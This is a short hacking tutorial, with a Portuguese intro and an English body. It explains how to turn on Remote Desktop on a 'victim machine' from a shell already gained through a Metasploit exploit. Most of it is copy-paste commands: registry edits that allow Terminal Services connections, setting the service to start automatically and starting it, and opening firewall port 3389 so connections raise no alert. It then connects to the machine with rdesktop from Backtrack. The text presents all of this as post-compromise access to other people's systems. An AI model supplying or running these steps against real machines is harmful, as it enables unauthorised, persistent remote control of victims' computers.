Vou adiantando que o tutorial está em Inglês, não tive saco pra traduzir rsrsrss.
Type : Tips and Trick
Level : Easy
There’s a lot of people while learn computer hacking, they didn’t like command prompt or a terminal too much. Some of them prefer quick and fast hacking with a nice and friendly interface that just click here and click there then it finished .
Today I will wrote tips and trick how to enable remote desktop using command prompt… (hey! it’s still usecommand prompt!)..but wait, this command prompt all you need just to copy and paste and execute it. You can execute the command in this tutorial from Telnet or Shell you got from compromised system, etc.
You can view my last two tutorial to help you much more understand this tips and trick :
How to create a simple exploit for Windows 7
How to add user with administrator rights via comand prompt
Let’s prepare the easy and simple tips and trick how to enable remote desktop using command prompt.
1. Telnet [or] Command Prompt –> with administrative rights
Step by Step :
1. This tips and trick I will continue from the tutorial about Creating Simple Exploit using Metasploit. So in this case you already got the shell or the command prompt.
2. Type this command to enable Remote Desktop on victim machine :
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
3. This step have not finished yet….we need to start the Terminal Service, because terminal service was disabled by default
sc config TermService start= auto
that command will make terminal service will start every time the computer started.
4. Now we need to start the terminal service for use right now, because the command on step 4 only to maketerminal service started every computer started and does not start the service.
net start Termservice
5. Okay everything already done, and we’ve almost done. The next step we need to open port that will be used by remote desktop on firewall, so the alert will not popping up while someone connect to remote desktop server.
netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
The command above will make firewall accepted every packet that came to port 3389 that used for Remote Desktop without alert.
6. Open a new terminal (Backtrack 5) or you can use Remote Desktop Client in Windows(Start –> All Programs –> Accessories –> Remote Desktop Connection). In this tips and trick I will use RDesktop in Backtrack 5 R2.
7. A GUI (Graphical User Interface) will pop out ask for user name and password.
8. Yes we’re in and successfully enable the remote desktop.
Hope it’s useful m8
– You can add the user via command prompt by following this tutorial about how to add user with administrative rights via command prompt (click here).